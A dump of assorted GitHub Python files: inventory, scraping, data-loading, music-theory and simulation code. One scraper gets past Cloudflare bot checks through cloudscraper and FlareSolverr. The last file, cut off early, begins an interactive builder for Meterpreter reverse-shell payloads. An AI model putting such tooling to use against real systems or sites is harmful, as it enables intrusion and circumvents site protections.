domain[\"users\"] = []\n user_link = self.get_link(domain[\"link\"], \"users\")\n data_users = self.api.get(user_link)\n if data_users:\n for user in data_users[\"user\"]:\n user[\"authz_name\"] = domain[\"name\"]\n if \"department\" not in user:\n user[\"department\"] = \"\"\n if user[\"groups\"]:\n for group in user[\"groups\"][\"group\"]:\n for group2 in domain[\"groups\"]:\n if group[\"name\"] == group2[\"name\"]:\n group2[\"users\"].append({\"value\": user[\"principal\"]})\n domain[\"users\"].append(user)\n\n domains.append(domain)\n\n return domains\n\n def get_user_data(self, domains=[]):\n \"\"\"\n Get users api data\n\n Arguments:\n domains (list): if defined, return only for specific user's domains\n Returns: (list) users data\n \"\"\"\n users = []\n data_users = self.api.get(\"users\")\n for user in data_users.get(\"user\", []):\n if domains and user[\"domain\"][\"name\"] not in domains:\n continue\n user[\"authz_name\"] = user[\"domain\"][\"name\"]\n if \"department\" not in user:\n user[\"department\"] = \"\"\n if \"name\" not in user:\n user[\"name\"] = \"\"\n users.append(user)\n\n return users\n\n def get_group_data(self):\n \"\"\"\n Get user's groups api data\n\n Returns: (list) groups data\n \"\"\"\n groups = []\n domains = self.get_domain_data()\n for domain in domains:\n if domain[\"groups\"]:\n for group in domain[\"groups\"]:\n groups.append(group)\n\n return groups\n\n def get_engine_data(self):\n \"\"\"\n Get engines api data\n\n Returns: (dict) engines data\n Raises: (ApiException) In case api data can't be loaded\n \"\"\"\n try:\n data = self.api.get()\n data[\"name\"] = self.server\n data[\"username\"] = self.config[\"api\"][\"USER\"]\n data[\"password\"] = self.config[\"api\"][\"PASSWORD\"]\n data[\"root_password\"] = self.config[\"ssh\"][\"PASSWORD\"]\n data[\"version\"] = \"{}.{}\".format(\n data[\"product_info\"][\"version\"][\"major\"],\n data[\"product_info\"][\"version\"][\"minor\"],\n )\n\n data[\"mac_pools\"] = self.get_macpool_data()\n data[\"clusters\"] = self.get_cluster_data()\n data[\"hosts\"] = self.get_host_data()\n data[\"storages\"] = self.get_storage_data()\n data[\"nfs_server\"] = \"\"\n for storage in data[\"storages\"]:\n if not data[\"nfs_server\"] and \"nfs\" in storage:\n data[\"nfs_server\"] = storage[\"nfs\"][\"address\"]\n\n data[\"external_providers\"] = self.get_ext_provider_data()\n data[\"vms\"] = self.get_vm_data()\n data[\"users\"] = self.get_user_data()\n data[\"groups\"] = self.get_group_data()\n\n return data\n except ApiException as ex:\n raise ex\n except Exception as ex:\n raise ApiException(\"Error getting data: {}\".format(ex))\n\n\nclass ApiException(Exception):\n \"\"\"\n Class for API exceptions\n \"\"\"\n\n def __str__(self):\n return \"[API] {}\".format(self.message)\n","repo_name":"grafuls/disruption_generator","sub_path":"disruption_generator/tools/ovirt-inventory/helpers/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":12762,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"1905291383","text":"import numpy as np\nimport os\nimport shutil\n\n\n\n########################################################################\n\n\nclass DataSet:\n def __init__(self, in_dir, exts='.jpg'):\n \n # Extend the input directory to the full path.\n in_dir = os.path.abspath(in_dir)\n # Input directory.\n self.in_dir = in_dir\n # Convert all file-extensions to lower-case.\n self.exts = tuple(ext.lower() for ext in exts)\n\n # Filenames for all the files in the training-set.\n self.filenames = []\n # Filenames for all the files in the test-set.\n #self.filenames_test = []\n\n # For all files/dirs in the input directory.\n for (dirpath, dirnames, filenames) in os.walk(in_dir):\n for file in filenames:\n self.filenames.append(file)\n \n\n \n def get_paths(self, test=False):\n \"\"\"\n Get the full paths for the files in the data-set.\n :param test:\n Boolean. Return the paths for the test-set (True) or training-set (False).\n :return:\n Iterator with strings for the path-names.\n \"\"\"\n\n for filename in self.filenames:\n # Full path-name for the file.\n path = os.path.join(self.in_dir,filename)\n\n yield str(path)\n\n \n def get_training_set(self):\n \"\"\"\n Return the list of paths for the files in the training-set,\n and the list of class-numbers as integers,\n and the class-numbers as one-hot encoded arrays.\n \"\"\"\n\n return list(self.get_paths())#,\\\n #list(self.get_label())\n #np.asarray(self.class_numbers), \\\n #one_hot_encoded(class_numbers=self.class_numbers,\n # num_classes=self.num_classes)\n\n \n\n\n\n########################################################################\n\n\n\n\n ### reference 'https://github.com/Hvass-Labs/TensorFlow-Tutorials/blob/master/dataset.py'","repo_name":"tanintem/deepsky-updater","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"5293634137","text":"from django.core.exceptions import ValidationError\nfrom django.forms.fields import FloatField, MultiValueField, ChoiceField\nfrom django.forms.widgets import MultiWidget, NumberInput, Select\n\nfrom django.contrib.gis.measure import D\n\n\nclass DistanceWidget(MultiWidget):\n def __init__(self, *args, choices=[], **kwargs):\n child_widgets = (\n NumberInput(),\n Select(choices=choices)\n )\n super().__init__(child_widgets, *args, **kwargs)\n\n def decompress(self, distance):\n if not isinstance(distance, D):\n distance = D(ft=distance)\n return [distance.ft, distance._default_unit]\n\n\nclass DistanceField(MultiValueField):\n widget = DistanceWidget\n\n DISTANCE_UNITS = [(\"ft\", \"feet\"),\n (\"m\", \"meters\"),\n (\"km\", \"km\"),\n (\"mi\", \"miles\")]\n\n def __init__(self, *args, min_value=D(m=10), max_value=D(m=100),\n initial_unit=\"ft\", **kwargs):\n error_messages = {\n \"incomplete\": \"Enter a distance\"\n }\n self.min_value = min_value\n self.max_value = max_value\n fields = (\n FloatField(),\n ChoiceField(choices=self.DISTANCE_UNITS,\n initial=initial_unit)\n )\n super().__init__(\n fields=fields,\n error_messages=error_messages,\n require_all_fields=True,\n *args, **kwargs\n )\n self.widget = DistanceWidget(choices=self.DISTANCE_UNITS)\n\n def clean(self, val):\n val = super().clean(val)\n if self.min_value and val < self.min_value:\n unit = val._default_unit\n min_as_unit = getattr(self.min_value, unit)\n raise ValidationError(f\"must be at least {min_as_unit} {unit}\")\n elif self.max_value and val > self.max_value:\n unit = val._default_unit\n max_as_unit = getattr(self.max_value, unit)\n raise ValidationError(f\"must be no more than {max_as_unit} {unit}\")\n\n return val\n\n def compress(self, values):\n return D(**{values[1]: values[0]})\n","repo_name":"codeforboston/cornerwise","sub_path":"server/shared/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"73229145210","text":"import csv\n\n\nsolutionPaths = [\"../lab7/solutions/TSPA/lsn_with_ls.csv\", \n \"../lab7/solutions/TSPB/lsn_with_ls.csv\", \n \"../lab7/solutions/TSPC/lsn_with_ls.csv\", \n \"../lab6/solutions/TSPD/ils.csv\"]\n\n\nfor solPath in solutionPaths:\n instanceName = solPath.split('/')[-2]\n with open(solPath, 'r') as f:\n reader = csv.reader(f)\n solution = [int(node[0]) for node in list(reader)]\n print(f\"{instanceName}: {', '.join(map(str, solution))}\\n\")\n ","repo_name":"alessandro1802/evo_comp","sub_path":"scripts/print_best_solutions.py","file_name":"print_best_solutions.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14019332518","text":"# we need to see full text, so we have to go thru all our saved pages, see if they have any \"cut\" and if so, put the link into csv file\nimport csv\nimport os\nimport bs4\n\ndef main():\n dir = r\"D:\\projects\\LiveJournal\\data\\html_pages\"\n for file in os.scandir(dir):\n name = file.name\n link = r\"D:\\projects\\LiveJournal\\data\\html_pages\" + \"\\\\\" + name\n with open(link, encoding='utf-8', newline='') as l:\n soup = bs4.BeautifulSoup(l, \"html.parser\")\n posts = soup.find_all(\"article\")\n for post in posts:\n cuts = post.find_all(\"b\", class_=\"ljcut-link lj-widget\")\n if not cuts:\n continue\n else:\n post_url = post.find(\"h3\", class_=\"entryunit__title\").find(\"a\").get(\"href\")\n with open (\"../data/posts_with_cut.csv\", \"a\", newline=\"\\n\") as output:\n writer = csv.writer(output, delimiter=',')\n writer.writerow([post_url])\n\n","repo_name":"vsomova/lj-nssi","sub_path":"code/06-save-posts-with-cut.py","file_name":"06-save-posts-with-cut.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23704252448","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport scrapy\n\nfrom dateutil import parser\n\nfrom ..items import CensusItem\n\nclass CensusPageSpider(scrapy.Spider):\n name = 'census_page'\n allowed_domains = ['www.phila.gov']\n start_urls = ['http://www.phila.gov/prisons/inmatesupport/Pages/Census.aspx']\n\n facilities = ['ASD ASDCU', 'ASD Cambria', 'ASD Cannery', 'ASD MOD 3',\n 'ASD WRP-UNIV. AVE', 'CFCF', 'DC-DETENTION CENTER', 'DC-PHSW',\n 'HOC', 'PICC', 'RCF', 'Weekenders', 'PDP \"In Facility\" Count'\n ]\n\n def parse(self, response):\n\n named_row = '''//div[contains(@id,'Census_')]/table/tr/td''' + \\\n '''[contains(normalize-space(text()),'%s')]/parent::tr/td'''\n\n date_row = response.xpath(named_row % ('CENSUS FOR',))\n\n if date_row is not None:\n\n date_text = self.clean_space(date_row[1].xpath('text()').extract_first())\n \n try:\n dt = parser.parse(date_text).date()\n except:\n dt = None\n else:\n dt = None\n\n for facility_name in self.facilities:\n data = response.xpath(named_row % (facility_name,))\n census = CensusItem(\n facility=self.clean_space(data[0].xpath('text()').extract_first()),\n date=dt)\n\n for i in range(len(census.ordered_fields)):\n field = census.ordered_fields[i]\n census[field] = self.as_int(\n data[i + 1].xpath('text()').extract_first())\n\n yield census \n\n # Helpers\n\n @staticmethod\n def clean_space(text):\n return re.sub(\"[\\s]+\", \" \", text.strip())\n\n\n @staticmethod\n def as_int(text):\n\n if text is None:\n return\n\n if type(text) is int:\n return text\n\n\n numbers = re.sub(\"[^\\d]\", \"\", text)\n\n try:\n number = int(numbers)\n except:\n number = None\n\n return number\n","repo_name":"ptvirgo/yasp","sub_path":"pdp_scraper/spiders/census_page.py","file_name":"census_page.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26853004982","text":"import time\nimport logging\nimport requests\nimport cloudscraper\nfrom scrapers.meta import Singleton\n\nclass ClientException(Exception):\n pass\n\nclass Client(metaclass=Singleton):\n \n def __init__(self, \n config, \n logger: logging.Logger = logging.getLogger('client')):\n self.config = config \n self.logger = logger\n self.cookies = None\n self.user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36'\n self.requests = cloudscraper.create_scraper()\n \n def _get(self, url):\n # 思路簡單,就是先請求一次,如果 Cloudflare 驗證失敗,就用 FlareSolverr 來解決驗證問題(更新 cookies)\n try:\n resp = self.requests.get(url, cookies=self.cookies, timeout=self.config.max_timeout, headers={\n 'User-Agent': self.user_agent\n })\n # 檢查請求是否成功\n if resp and resp.status_code == 200:\n return resp.text\n else:\n raise ClientException(f'請求失敗,狀態碼: {resp.status_code}')\n except (cloudscraper.exceptions.CloudflareChallengeError, ClientException) as e:\n resp = requests.post(self.config.flaresolverr_url, headers={'Content-Type': 'application/json'}, json={\n \"cmd\": \"request.get\",\n \"url\": url,\n \"maxTimeout\": self.config.max_timeout * 1000,\n }, timeout=self.config.max_timeout)\n if resp and resp.status_code == 200:\n j = resp.json()\n if j and j.get('status') == 'ok':\n self.logger.info(f'FlareSolverr 請求成功,正在更新 cookies')\n self.cookies = {i['name']:i['value'] for i in j['solution']['cookies']}\n self.user_agent = j['solution']['userAgent']\n return j['solution']['response']\n else:\n self.logger.error(f'FlareSolverr 請求失敗,可能是 Cloudflare 驗證失敗')\n else:\n self.logger.error(f'FlareSolverr 請求失敗,可能是 FlareSolverr Server 未啟動')\n raise Exception(f'請求失敗,狀態碼: {resp.status_code}')\n \n def get(self, url):\n retry = 0\n self.logger.debug(f'開始請求,請求次數: {retry}')\n while retry < self.config.retry:\n try:\n return self._get(url)\n except Exception as e:\n self.logger.error(f'請求失敗,正在重試: {e}')\n time.sleep(self.config.delay)\n retry += 1\n self.logger.error(f'請求失敗,已超過最大重試次數: {self.config.retry}')\n return None\n \nif __name__ == '__main__':\n \n class FlareSolverrConfig:\n flaresolverr_url: str = 'http://localhost:8191/v1'\n max_timeout = 60\n retry: int = 5\n delay: int = 5\n \n config = FlareSolverrConfig()\n client = Client(config)\n for i in range(2):\n print(client.get('https://www.google.com/'))","repo_name":"aitay721822/AdmissionScraper","sub_path":"scrapers/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14746563143","text":"\"\"\"\nprocessing results from finance APIs\n\"\"\"\n\nimport csv\nimport re\nimport numpy as np\n\n# Google Finance API example\n# https://www.google.com/finance/getprices?q=2330&x=TPE&i=3600&p=10d&f=d,c,h,l,o,v\n\ndef process_google_finance_history(gf_history_file):\n \"\"\"\n Process a read stock history\n\n Args:\n gf_history_file: the path to the google finance history csv file\n\n Returns:\n A numpy array\n \"\"\"\n\n interval = 86400\n timestamp = None\n current_timestamp = None\n processed = []\n\n for row in csv.reader(open(gf_history_file, 'r')):\n if len(row) is 0:\n continue\n if row[0].startswith('INTERVAL='):\n interval = int(row[0].split('INTERVAL=')[-1])\n if re.findall(r'^[a0-9]', row[0]):\n date = row[0]\n # absolute timestamp\n if date.startswith('a'):\n current_timestamp = timestamp = float(date.split('a')[-1])\n # relative offset\n else:\n offset = int(date)\n current_timestamp = timestamp + offset * interval\n row[0] = current_timestamp\n row[1:] = [float(value) for value in row[1:]]\n processed.append(row)\n return np.array(processed)\n\nif __name__ == '__main__':\n\n process_google_finance_history('data/2330')\n","repo_name":"maxis1718/reversal","sub_path":"reversal/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"33451459382","text":"import pandas as pd\n\npath = 'dump02t.csv'\n\ncsv = pd.read_csv(path, delimiter=';', dtype='str')\n\nrts = 0\nfor tweet in csv['full_text']:\n if tweet.startswith('RT @'):\n rts +=1\n else:\n print(tweet)\n\ntotal = len(csv)\nprint('Total tweets:', total)\nprint('\\t RTs:', rts)\nprint('\\t Non RTs:', (total-rts))","repo_name":"JavierBJ/gender-politics-twitter","sub_path":"tweets/describe_csv.py","file_name":"describe_csv.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"42955027626","text":"import re\nimport numpy as np\n\nclass Note:\n\n notes = ['C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B']\n\n def __init__(self, note_name, octave=4):\n self.note_name = note_name\n self.octave = octave\n\n def shift(self, halftone=0):\n idx_curr = Note.notes.index(self.note_name)\n semitone_new = idx_curr + halftone\n idx_new = semitone_new % len(Note.notes)\n note_name_new = Note.notes[idx_new]\n octave_new = self.octave + semitone_new // len(Note.notes)\n return Note(note_name_new, octave=octave_new)\n\n def interval(self, name):\n '''\n https://www.earmaster.com/products/free-tools/interval-song-chart-generator.html\n '''\n interval_halftone_map = {\n 0: ['perfect_unison', 'P1'],\n 1: ['minor_second', 'm2'],\n 2: ['major_second', 'M2'],\n 3: ['minor_third', 'm3'],\n 4: ['major_third', 'M3'],\n 5: ['perfect_fourth', 'P4'],\n 6: ['augmented_fourth', 'A4', 'diminished_fifth', 'd5', 'tritone', 'tt'],\n 7: ['perfect_fifth', 'P5'],\n 8: ['minor_sixth', 'm6', 'augmented_fifth', 'A5'],\n 9: ['major_sixth', 'M6', 'diminished_seventh', 'd7'],\n 10: ['minor_seventh', 'm7'],\n 11: ['major_seventh', 'M7'],\n 12: ['perfect_octvae', 'P8']\n }\n for halftone, interval_names in interval_halftone_map.items():\n if name in interval_names:\n break\n return self.shift(halftone=halftone)\n\n def get_str(self, print_octave=False):\n s = f'{self.note_name}'\n if print_octave:\n s += f'{self.octave}'\n return s\n\n def is_natural(note_name):\n if ('#' in note_name) or ('b' in note_name):\n return False\n else:\n return True\n\nclass Notes:\n\n def __init__(self, input_notes):\n '''\n `notes` is a list of Note objects or strings of note_names\n '''\n curr_notes = []\n for input_note in input_notes:\n if isinstance(input_note, str):\n curr_notes.append(Note(input_note))\n else:\n curr_notes.append(input_note)\n self.notes = curr_notes\n\n def get_str(self, print_octave=False):\n l = []\n for note in self.notes:\n l.append(note.get_str(print_octave=print_octave))\n return ' '.join(l)\n\n def __str__(self):\n return self.get_str()\n\n def __contains__(self, note):\n '''\n Checks if a note is in this set of notes\n '''\n note_names = [n.note_name for n in self.notes]\n if note.note_name in note_names:\n return True\n else:\n return False\n\n def from_intervals(root_name, interval_names, octave=4):\n note_root = Note(root_name, octave=octave)\n notes = []\n for interval_name in interval_names:\n notes.append(note_root.interval(interval_name))\n return notes\n\nclass Chord(Notes):\n\n chord_interval_map = {\n # triad\n '': ['P1', 'M3', 'P5'],\n 'M': ['P1', 'M3', 'P5'],\n 'm': ['P1', 'm3', 'P5'],\n 'dim': ['P1', 'm3', 'd5'],\n 'aug': ['P1', 'M3', 'A5'],\n\n # seventh\n 'M7': ['P1', 'M3', 'P5', 'M7'],\n 'm7': ['P1', 'm3', 'P5', 'm7'],\n '7': ['P1', 'M3', 'P5', 'm7'],\n 'dim7': ['P1', 'm3', 'd5', 'd7'],\n 'aug7': ['P1', 'M3', 'A5', 'm7']\n }\n\n def from_symbol(symbol):\n match = re.search('(\\w#*)(m|M|dim|aug)*(\\d*)', symbol)\n root = match.group(1)\n quality = match.group(2) if match.group(2) is not None else ''\n extension = match.group(3)\n chord_name = quality + extension\n return root, chord_name\n\n def __init__(self, symbol, octave=4):\n root_name, chord_name = Chord.from_symbol(symbol)\n self.root = Note(root_name, octave=octave)\n self.chord_name = chord_name\n interval_names = Chord.chord_interval_map[chord_name]\n notes = Notes.from_intervals(root_name, interval_names, octave=octave)\n super().__init__(notes)\n\nclass Scale(Notes):\n\n scale_interval_map = {\n 'major': ['P1', 'M2', 'M3', 'P4', 'P5', 'M6', 'M7'],\n 'minor': ['P1', 'M2', 'm3', 'P4', 'P5', 'm6', 'm7'],\n 'harmonic_minor': ['P1', 'M2', 'm3', 'P4', 'P5', 'm6', 'M7'],\n 'major_pentatonic': ['P1', 'M2', 'M3', 'P5', 'P6'],\n 'minor_pentatonic': ['P1', 'm3', 'P4', 'P5', 'm7'],\n }\n\n def __init__(self, root_name, scale_name='major', octave=4):\n self.root = Note(root_name, octave=octave)\n self.scale_name = scale_name\n interval_names = Scale.scale_interval_map[scale_name]\n notes = Notes.from_intervals(root_name, interval_names, octave=octave)\n super().__init__(notes)\n\nclass Fretboard:\n\n def __init__(self, tuning=['E3', 'A3', 'D4', 'G4', 'B4', 'E5'], max_fret=22):\n strings = []\n for open_string in tuning:\n note_name = open_string[0]\n octave = int(open_string[1])\n open_string_note = Note(note_name, octave=octave)\n string = []\n for halftone in range(max_fret + 1):\n string.append(open_string_note.shift(halftone=halftone))\n strings.append(string)\n self.strings = strings\n\n def display(self, highlight_notes=None, hightlight_frets=None, filler='---'):\n\n def str_format(note_name, filler):\n return f'{filler}{note_name:<2}{filler}'.replace(' ', filler[0])\n\n def fret0_format(note_name):\n return f'{note_name:<2}||'\n\n frets_str = [str_format(i, filler=filler) for i in range(1, len(self.strings[0]))]\n fret_label = fret0_format('0') + '|'.join(frets_str)\n\n strings_str = [fret_label]\n divider = '='*((3 + 2*len(filler))*(len(self.strings[0]) - 1) + 3)\n strings_str.append(divider)\n for string in self.strings[::-1]:\n l = []\n for fret in range(1, len(string)):\n note = string[fret]\n if highlight_notes is None or note in highlight_notes:\n l.append(str_format(note.note_name, filler=filler))\n else:\n l.append(str_format('-', filler=filler))\n open_string_note = string[0]\n string_str = fret0_format(open_string_note.note_name) + '|'.join(l)\n strings_str.append(string_str)\n strings_str.append(divider)\n strings_str.append(fret_label)\n display_str = '\\n'.join(strings_str)\n print(display_str)\n\n def get_note_name(self, string_number, fret):\n return self.strings[::-1][string_number - 1][fret].note_name\n\n def exercise_1(self, note_name='A', display_notes=False, string_numbers=[6, 5, 4, 3, 2, 1]):\n if display_notes:\n self.display()\n\n while True:\n answer = input(f'Type in the fret numbers of {note_name} in the string order of {string_numbers}, separated by a space: ')\n submitted_frets = [int(fret) for fret in answer.split()]\n submitted_note_names = [self.get_note_name(string_number, submitted_fret) for submitted_fret, string_number in zip(submitted_frets, string_numbers)]\n print('Your submitted answer: ', submitted_note_names)\n result = all(submitted_note_name == note_name for submitted_note_name in submitted_note_names)\n if result:\n self.display(highlight_notes=Notes([note_name]))\n print('CORRECT!')\n break\n else:\n print('WRONG!')\n\n def exercise_2(self, natural_only=True, display_notes=False, string_numbers=[6, 5, 4, 3, 2, 1]):\n if natural_only:\n note_pool = [note_name for note_name in Note.notes if Note.is_natural(note_name)]\n else:\n note_pool = Note.notes\n\n while True:\n note_name = np.random.choice(note_pool, size=1)[0]\n self.exercise_1(note_name=note_name)\n","repo_name":"krongch2/music","sub_path":"music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":8029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23944924061","text":"#!/usr/bin/env python\n# import pytest\nimport os\nfrom person import Person\n\nclass Logger(object):\n \n # checked\n def __init__(self, file_name):\n self.file_name = file_name\n\n\n def write_metadata(self, pop_size, vacc_percentage, virus_name, mortality_rate,\n basic_repro_num):\n\n if os.path.exists(self.file_name):\n writeMode = 'a'\n else:\n writeMode = 'w'\n\n myLogFile = open(self.file_name, writeMode)\n myString = \"pop_size: {0} \\nvacc_percentage: {1} \\nvirus_name: {2} \\nmortality_rate: {3} \\nbasic_repro_num: {4}\\n\".format(\n pop_size, vacc_percentage, virus_name, mortality_rate, basic_repro_num)\n myLogFile.write(myString)\n\n myLogFile.close()\n\n\n def log_interaction(self, person, random_person, random_person_sick,\n random_person_vacc, did_infect):\n \n outFile = open(self.file_name, \"a\")\n\n if random_person_vacc is True:\n outFile.write(\"{0} is vaccinated, nothing happened!\\n\".format(random_person._id))\n elif random_person_sick is True:\n outFile.write(\"{0} is already infected, nothing happened!\\n\".format(random_person._id))\n elif random_person_vacc is False and random_person_sick is None:\n outFile.write(\"{0} infected {1}!\\n\".format(person._id, random_person._id))\n else:\n outFile.write(\"No interaction logged\\n\")\n\n def log_infection_survival(self, person, did_die_from_infection):\n \n outFile = open(self.file_name, \"a\")\n\n if did_die_from_infection is False:\n outFile.write(\"{0} survived!\\n\".format(person._id))\n elif did_die_from_infection is True:\n outFile.write(\"AHHH {0} DIED!\\n\".format(person._id))\n\n def log_time_step(self, time_step_number):\n \n outFile = open(self.file_name, \"a\")\n outFile.write(\"Time step: {0} ended...beginning {1}\\n\".format(time_step_number, time_step_number + 1))\n \n\ndef test_logger_instantiation():\n\n\n logger = Logger(\"simulation.txt\")\n assert logger.file_name == \"simulation.txt\"\n\n\n logger = Logger(\"logger_file.txt\")\n assert logger.file_name == \"logger_file.txt\"\n\n\n\ndef test_write_metadata():\n logger = Logger(\"simulation.txt\")\n logger.write_metadata(200, 0.45, \"HIV\", 0.88, 0.23)\n\n\n file = open(\"simulation.txt\", \"r\")\n assert file is not None\n linesInFile = file.readlines()\n lastFiveLinesInFile = linesInFile[-5:]\n\n for i, line in enumerate(lastFiveLinesInFile):\n splitLine = line.split(\" \")\n if i == 0: # current line == 1,\n if \"200\" in line:\n lineOneArray = splitLine\n assert lineOneArray[1] == \"200\"\n if i == 1:\n if \"0.45\" in line:\n lineTwoArray = splitLine\n assert lineTwoArray[1] == \"0.45\"\n if i == 2:\n if \"HIV\" in line:\n lineThreeArray = splitLine\n assert lineThreeArray[1] == \"HIV\"\n if i == 3:\n if \"0.88\" in line:\n lineFourArray = splitLine\n assert lineFourArray[1] == \"0.88\"\n if i == 4:\n if \"0.23\" in line:\n lineFiveArray = splitLine\n assert lineFiveArray[1] == \"0.23\\n\"\n\ndef test_log_interaction_():\n\n logger = Logger(\"simulation.txt\")\n\n person1 = Person(\"sam\", True, True) # is alive & vaccinated\n person2 = Person(\"bob\", False, False) # is alive & not vaccinated\n\n logger.log_interaction(person1, person2, False, True)\n\n logger.log_interaction(person1, person2, True)\n\n\n file = open(\"logger_file.txt\", \"r\")\n data = file.read()\n\n print(data)\n\n\n logger.log_interaction(person1, person2, None, False)\n\n file = open(\"simulation.txt\", \"r\")\n assert file is not None\n\n linesInFile = file.readlines()\n\n","repo_name":"makhmudislamov/HerdImmunityMakeSchool-Refactored","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4673745158","text":"def addTwoNumbers(n1, n2):\n sumanswer = n1 + n2\n # returning sum of two numbers\n return sumanswer\n# function to sub 2 numbers\ndef subtractAfromB(a, b):\n subtractAnswer = abs(a - b)\n return subtractAnswer\n# function to mul 2 numbers\ndef multiplyTwoNumbers(n1,n2):\n multiplyAnswer = (n1*n2)\n return multiplyAnswer\n\n# function to divide\ndef divide(numerator, denominator):\n dividedanswer = numerator / denominator\n return dividedanswer\n#main code\ndef sum(i):\n total =0\n for num in i:\n total = addTwoNumbers(total,num)\n return total\n\n#we have sales data for a week. \ncostOfCoffee, costOfTea, costOfVadai =25,20,25\nlist1 = []\ncoffeeSales = [56,78,56,45,90, 103,120]\nteaSales = [100,123,456,123,222,400,346]\nvadaiSales = [23,45,67,12,89,90,120]\nlist1.append(coffeeSales)\nlist1.append(teaSales)\nlist1.append(vadaiSales)\n#Find total sales in the week.\ntotal =0\nfor i in list1: \n output = sum(i)\n total = addTwoNumbers(total,output)\n avg =divide(output,len(i))\n print(f'The total sales is {output} , and its their average is {avg} ') \nemployeeSalary = 500 #Rs500 per day\nemployeeSalaryPerWeek = multiplyTwoNumbers(500,7)\n#calculate sales per week\nprint(f\"the total sales per week is {total}\")\n#calcuate sales per month\nsalesPerMonth = multiplyTwoNumbers(total,4)\nprint(f\"Total sales per month : \",salesPerMonth)\n#calculate profit.\nprint(f'Profit is :', subtractAfromB(salesPerMonth,employeeSalary))\n\n\n'''\noutput --\nThe total sales is 548 , and its their average is 78.28571428571429 \nThe total sales is 1770 , and its their average is 252.85714285714286 \nThe total sales is 446 , and its their average is 63.714285714285715\nthe total sales per week is 2764\nTotal sales per month : 11056\nProfit is : 10556\n\n'''","repo_name":"NikishDAniel/DANIEL_SAYUR","sub_path":"nextwealth/functions/calculator3.py","file_name":"calculator3.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29427908069","text":"def numero_perfecto(a):\n suma=0\n for i in range(1,a):\n if a%i==0:\n suma=suma+i\n if suma==a:\n return True\n elif suma!=a:\n return False\n\nif __name__==\"__main__\":\n a=int(input(\"Ingrese a: \"))\n print(\"el numero es perfecto: \",numero_perfecto(a))\n n=int(input(\"Ingrese un numero: \"))\nn=9\nsuma2=0 \nfor i in range(1,n):\n if numero_perfecto(i)==True:\n suma2=suma2+i\nif __name__==\"__main__\":\n print(suma2)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema2_ej3/tema2_ej3_b8002139cdde66b87638f7f91d169d96.py","file_name":"tema2_ej3_b8002139cdde66b87638f7f91d169d96.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1895462123","text":"import unittest\nfrom src.task_scheduler import Solution\n\n\nclass Tests(unittest.TestCase):\n def test_1(self):\n tasks = [\"A\", \"A\", \"A\", \"B\", \"B\", \"B\"]\n n = 2\n test_result = 8\n actual_result = Solution()\n self.assertEqual(test_result, actual_result.leastInterval(tasks, n))\n\n def test_2(self):\n tasks = [\"A\", \"A\", \"A\", \"B\", \"B\", \"B\"]\n n = 0\n test_result = 6\n actual_result = Solution()\n self.assertEqual(test_result, actual_result.leastInterval(tasks, n))\n\n def test_3(self):\n tasks = [\"A\", \"A\", \"A\", \"A\", \"A\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\"]\n n = 2\n test_result = 16\n actual_result = Solution()\n self.assertEqual(test_result, actual_result.leastInterval(tasks, n))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"jrandj/leetcode","sub_path":"python/test/test_test_scheduler.py","file_name":"test_test_scheduler.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"72988398967","text":"#!/usr/bin/python3\n\nimport os\nimport sys\n\n\nprint(\"Payload Generator\")\nprint(\"\")\n\n###### Getting IP\nprint(\"[+] Finding currently used network adapters\")\nos.system(\"ifconfig | grep flags | cut -d ':' -f 1\")\nprint(\"\")\nip_choice = input(\"[++] Please choice which adapter you are using. \")\nprint(\"\")\nprint(\"Your IP address is...\")\nip1 = os.popen(\"ifconfig {adp} | grep 'inet ' | cut -d ' ' -f 10\".format(adp=ip_choice)).read()\nip = ip1.rstrip()\nprint(ip)\n\n\n###### Setting Port\nport = input(\"[++] Please enter port you will be listening on. \")\nprint(\"\")\n\n\n\n###### Setting payload\nprint(\"[+] Building payload...\")\ntype_1 = input(\" [++] Staged or Stageless? (1 or 2): \")\ntype_2 = input(\" [++] Meterpreter or Standard? (1 or 2): \")\nos1 = input(\" [++] Windows or Linux? (1 or 2): 